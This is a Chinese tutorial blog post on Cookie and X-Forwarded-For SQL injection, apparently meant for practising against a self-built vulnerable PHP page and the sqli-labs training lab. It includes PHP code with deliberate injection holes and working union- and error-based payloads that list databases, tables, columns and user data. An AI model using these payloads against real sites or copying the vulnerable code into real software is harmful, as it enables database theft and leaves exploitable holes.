Cookie注入和X-Forwarded-For注入

news2024/12/23 15:52:44

💪💪Cookie注入和X-Forwarded-For注入

  • 一 .Cookie注入
    • 1.创建漏洞环境
    • 2.漏洞攻击
        • 2.1判断是否有注入
        • 2.2信息收集
        • 2.3注入获取数据库名
        • 2.4注入获取表名
        • 2.5注入获取列名
        • 2.6注入获取信息
    • 3.sql靶场实战
  • 二. X-Forwarded-For注入
    • 1.创建漏洞环境
    • 2.漏洞攻击
        • 2.1判断是否有注入
        • 2.2信息收集
    • 3.sql靶场实战
        • 2.3注入获取数据库名
        • 2.4注入获取表名
        • 2.5注入获取列名
        • 2.6注入获取信息


一 .Cookie注入

1.创建漏洞环境

💪💪第一步创建sql环境,直接再mysql下运行

create database loophole;
use loophole;
create table sql_test(
    id int auto_increment,
    primary key (id),
    username char(10),
    address char(20)
);
insert into sql_test values (1,'admin1','hubei'),(2,'mozhe','beijin'),(3,'admin','hubei'),(4,'yk','ensi');

⚠️⚠️第二步直接运行如下代码,其中连接数据库的用户名和密码必须换成自己的数据库的

 <?php
$id = $_COOKIE['id'];
$value = "1";
setcookie("id", $value);
$con = mysqli_connect("localhost", "root", "901026yk", "loophole");
if (mysqli_connect_error()) {
    echo "连接错误" . mysqli_connect_error();
}
$result = mysqli_query($con, "select * from sql_test where id = " . $id);
if(!$result)
{
    printf(mysqli_error($con));
    exit();
}
$row = mysqli_fetch_array($result);
echo $row['username'] . "  " .$row['address'];

2.漏洞攻击

2.1判断是否有注入

在这里插入图片描述

如上id = 1 and 1=1显示正常
在这里插入图片描述
如上id = 1 and 1=2显示不正常,所以存在Cookie注入,并且1前后无标点符号

2.2信息收集

id=-1 union select 1,database(),user() :获取本网址的数据库

在这里插入图片描述

2.3注入获取数据库名

id = -1 union select 1,group_concat(schema_name),3 from information_schema.SCHEMATA; :获取所有数据库的名字,这条语句一般用于跨库注入

在这里插入图片描述

2.4注入获取表名

id = -1 union select 1, group_concat(table_name),3 from information_schema.TABLES where TABLE_SCHEMA='loophole'

在这里插入图片描述

2.5注入获取列名

id = -1 union select 1, group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA='loophole' and TABLE_NAME='sql_test';

在这里插入图片描述

2.6注入获取信息

id = -1 union select 1, group_concat(username),3 from loophole.sql_test

在这里插入图片描述

3.sql靶场实战

sqllibs第20关

    1. 先输入admin,admin,查看详细信息如下:

在这里插入图片描述
根据提示信息判断cookie注入

    1. 从源代码中我们可以看到 cookie 从 username 中获得值后,当再次刷新时,会从 cookie 中读取 username,然后进行查询。
      登录成功后,我们修改 cookie,再次刷新时,这时候 sql 语句就会被修改了。我们修改 cookie 为uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#可以看到报错了,我们得到了 mysql 的路径。
      其他的注入方法自行测试呦!

二. X-Forwarded-For注入

1.创建漏洞环境

直接运行如下代码,其中连接数据库的用户名和密码必须换成自己的数据库的

<?php

/**
 * getenv()
 * $SERVER[]
 * $ENV[] $_ENV是一个包含服务器端环境变量的数组。它是PHP中一个超级全局变量
 */
//“REMOTE_ADDR”  (直连IP地址)
//"HTTP_CLIENT_IP" (代理服务器ip地址)
//HTTP_X_FORWARDED_FOR (最开始的IP地址)
//构造  X-Forwarded-For: 1

$con = mysqli_connect("localhost", "root", "901026yk", "loophole");
if (mysqli_connect_error()) {
    echo "连接错误" . mysqli_connect_error();
}
if(getenv('HTTP_CLIENT_IP')) //要求没有代理服务器
{
    $ip = getenv('HTTP_CLIENT_IP');
}elseif(getenv('HTTP_X_FORWARDED_FOR'))
{
    $ip = getenv('HTTP_X_FORWARDED_FOR');
}elseif(getenv('REMOTE_ADDR'))
{
    $ip = getenv('REMOTE_ADDR');
}else
{
    $ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$result = mysqli_query($con, "select * from sql_test where id = " . $ip);
if(!$result)
{
    printf(mysqli_error($con));
}
$row = mysqli_fetch_array($result);
echo $row['username'] . " " . $row['address'];

2.漏洞攻击

X-Forwarded-For注入攻击的全过程必须要使用burpsuit,抓包之后使用burpsuit更改数据包,就是加上X-Forwarded-For: 1

2.1判断是否有注入

这个判断是否有注入攻击必须使用sqlmap,sqlmap -u 网址
请添加图片描述
请添加图片描述

2.2信息收集

请添加图片描述

其他跟union注入一模一样

3.sql靶场实战

请添加图片描述

2.3注入获取数据库名

-1 union select 1,database(),user() :获取本网址的数据库

在这里插入图片描述

-1 union select 1,group_concat(schema_name),3 from information_schema.SCHEMATA; :获取所有数据库的名字,这条语句一般用于跨库注入

2.4注入获取表名

-1 union select 1, group_concat(table_name),3 from information_schema.TABLES where TABLE_SCHEMA='loophole'

在这里插入图片描述

2.5注入获取列名

-1 union select 1, group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA='loophole' and TABLE_NAME='sql_test';
在这里插入图片描述

2.6注入获取信息

-1 union select 1, group_concat(username),3 from loophole.sql_test
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/25903.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

浅析Betaflight中的OSD叠加程序【MAX7456AT7456】

前言&#xff1a;想要对OSD下手已经不是头一次了&#xff0c;前几次都浅尝辄止。一个是能力不够&#xff0c;BetaFlight的代码体系太庞大了&#xff0c;看不懂也摘不出来。 这次要做一款带osd功能的接收机&#xff08;用在遥控车上&#xff09;&#xff0c;所以又来打飞控程序…

[附源码]java毕业设计校园快递管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

1万属性,100亿数据,每秒10万吞吐,架构如何设计?

有一类业务场景&#xff0c;没有固定的schema存储&#xff0c;却有着海量的数据行数&#xff0c;架构上如何来实现这类业务的存储与检索呢&#xff1f;58最核心的数据“帖子”的架构实现技术细节&#xff0c;今天和大家聊一聊。一、背景描述及业务介绍什么是58最核心的数据&…

深度学习入门(四十四)计算机视觉——多尺度目标检测

深度学习入门&#xff08;四十四&#xff09;计算机视觉——多尺度目标检测前言计算机视觉——多尺度目标检测教材1 多尺度锚框2 多尺度检测3 小结前言 核心内容来自博客链接1博客连接2希望大家多多支持作者 本文记录用&#xff0c;防止遗忘 计算机视觉——多尺度目标检测 教…

【Hack The Box】linux练习-- Postman

HTB 学习笔记 【Hack The Box】linux练习-- Postman &#x1f525;系列专栏&#xff1a;Hack The Box &#x1f389;欢迎关注&#x1f50e;点赞&#x1f44d;收藏⭐️留言&#x1f4dd; &#x1f4c6;首发时间&#xff1a;&#x1f334;2022年11月17日&#x1f334; &#x1f…

大学生旅游风景主题dreamweaver网页设计大作业-陕西渭南HTML+CSS制作网页

家乡旅游景点网页作业制作 网页代码运用了DIV盒子的使用方法&#xff0c;如盒子的嵌套、浮动、margin、border、background等属性的使用&#xff0c;外部大盒子设定居中&#xff0c;内部左中右布局&#xff0c;下方横向浮动排列&#xff0c;大学学习的前端知识点和布局方式都有…

从不学无术到架构师Leader:这份java面试知识宝典,一举斩获京东T8

前言 面试了大大小小各种公司&#xff0c;有BAT的&#xff0c;上市的&#xff0c;AB各种轮的&#xff0c;初创的……今天大概列举了下&#xff0c;至少有30家公司。 在这里我总结了求职面试需要注意的各种问题&#xff0c;希望可以用我收集的《Java面试核心知识笔记》及面试经…

element UI 组件封装--搜索表单(含插槽和内嵌组件)

组件封装–搜索表单 searchForm.vue 可根据需要&#xff0c;参考姓名和工作自行增加更多常用的默认搜索项 <template><div style"padding: 30px; width: 300px"><el-formref"searchFormRef":model"searchData":label-width"…

伽马校正笔记(Gamma Correction)

在数字图像系统中&#xff0c;伽马&#xff08;Gamma&#xff09;是一个重要的但很少被正确理解的特性。它定义了一个像素的数值和对应的实际亮度之间的关系。 人眼感知的亮度和相机“看到”的亮度区别 对于数码相机来说&#xff0c;当检测的光子数增加一倍时&#xff0c;sens…

Win11蓝屏代码IRQL NOT LESS OR EQUAL的处理方法

蓝屏错误IRQL NOT LESS OR EQUAL是用户常见的系统故障了&#xff0c;升级到Win11新系统也遇到了同样的问题&#xff0c;那么Win11蓝屏问题IRQL NOT LESS OR EQUAL要如何解决&#xff1f;下面就来看看小编整理的解决办法。 什么是 IRQL_NOT_LESS_OR_EQUAL 错误&#xff1f; IRQL…

【Docker】Docker入门学习

【Docker】学习docker 1.Docker安装与启动 1.1.安装 【第一步】yum包更新到最新版本 sudo yum update【第二步】安装需要的软件包&#xff0c;yum-util提供的yum-config-manager功能&#xff0c;另外两个是devicemapper驱动依赖的 sudo yum install -y yum-utils device-m…

三菱FX3U——ST编程定时器和计数器

在部件选择——FB——选择定时器类型 双击弹出标签登录/选择对话框&#xff0c;点击应用&#xff1b; 编辑器自动插入TON_1; 光标放在TON_1后&#xff0c;按下CTRLF1&#xff0c;补全代码; IN&#xff1a; 输入&#xff0c;PT&#xff1a;定时时间&#xff0c;Q&#xff1a;输…

windows上使用Gitblit搭建git服务仓库

第一步: 由于要运行jar包&#xff0c;得先安装好java环境&#xff0c;安装环境的教程很多&#xff0c;这步不做赘述 第二步&#xff1a; 找到Gitblit的安装包 http://gitblit.github.io/gitblit/ 这是官网地址&#xff0c;我就没下载成功过&#xff0c;你要不信&#xff0c;也可…

PyQt5 QMediaPlayer播放不了视频

代码&#xff1a; 编辑器 pycharm: from PyQt5.QtWidgets import QApplication, QWidget, QFileDialog from PyQt5.QtMultimediaWidgets import QVideoWidget from PyQt5.QtMultimedia import QMediaPlayer, QMediaContent import sysapp QApplication(sys.argv)win QWidge…

数据库主键一定要自增的吗?有哪些场景下不建议自增?

我们平时建表的时候&#xff0c;一般会像下面这样。 CREATE TABLE user (id int NOT NULL AUTO_INCREMENT COMMENT 主键,name char(10) NOT NULL DEFAULT COMMENT 名字,PRIMARY KEY (id) ) ENGINEInnoDB DEFAULT CHARSETutf8mb4;出于习惯&#xff0c;我们一般会加一列id作为…

K8s基础之-Pod

第一章&#xff1a;什么是Pod 1.1 创建一个Pod1.2 更改Pod的启动命令和参数1.3 Pod状态及pod故障排查命令1.4 Pod镜像拉取策略1.5 Pod重启策略 第二章&#xff1a;Pod探针 2.1 Pod的三种探针2.2 Pod探针的实现方式 2.2.1 数据库建表语句2.2.2 数据库解析2.2.3 修改Hive数据库…

Servlet常用API

目录 一、HttpServlet 1、HttpServlet核心方法 2、Servlet的生命周期 二、HttpRequest 1、HttpRequest核心方法 2、代码示例 示例1&#xff1a;打印请求信息 示例2&#xff1a;获取GET请求中的query string 示例3&#xff1a;获取POST请求中的query string(form表单形…

功率谱分析笔记-------脑电相关

1&#xff1a;功率谱分析的方法介绍 功率谱分析的方法大致可以分为两大类&#xff1a;第一类是经典的功率谱计算方法&#xff0c;第二类是现代功率谱计算方法&#xff0c;如图1所示。其中第一类经典功率谱分析方法&#xff0c;又可以分为直接法、间接法和改进的直接法。直接法…

常见移动端导航类型

手机导航设计是人机交互最重要的桥梁和平台&#xff0c;旨在引导用户正确的方向&#xff0c;不迷路。 好的菜单设计不仅能提升整个产品的用户体验&#xff0c;还能让用户耳目一新。 一、导航菜单的作用是什么 &#xff1f; 1.提升产品内容和功能结构和层次 2.重点展示核心功能…

windows cmd 常用操作命令

文章目录进程端口相关打开面板快捷键防火墙相关进程端口相关 可以查看本机开放的全部端口. netstat -ano 协议&#xff1a;分为TCP和UDP 本地地址&#xff08;Local Address&#xff09;&#xff1a;代表本机IP地址和打开的端口号 外部地址&#xff08;Foreign Address&#…